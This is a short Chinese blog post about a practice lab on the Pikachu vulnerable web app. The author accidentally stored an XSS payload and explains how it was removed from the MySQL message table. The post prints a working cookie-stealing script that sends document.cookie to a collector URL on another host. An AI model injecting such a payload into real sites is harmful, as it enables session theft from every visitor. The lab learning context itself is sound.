存储型XSS清除方法

25 篇文章 0 订阅
14 篇文章 0 订阅

今天也是被自己气哭的一天

今天做XSS盗取cookie实验

<script>document.location='http://192.168.241.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

就是用这个罪恶的payload

我眼花之下把他输入了存储型的XSS里:(

导致我一进去存储型就给我跳转到首页

刚开始我以为被攻击了,查看源代码发现居然插入了我的payload

解决办法:

打开mysql数据库

use pikachu

show tables

select * from message 会看到你插入的payload

delete from message where id=87 删掉他

这就好了

存储型XSS会把键入的信息永久保存在数据库里

可见这种存储型的xss的危害是非常大的,因为它被存储到了后台数据库,每一个打开这个页面的用户都会因此而“中招”,这造成的是一种持久性的危害。

  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值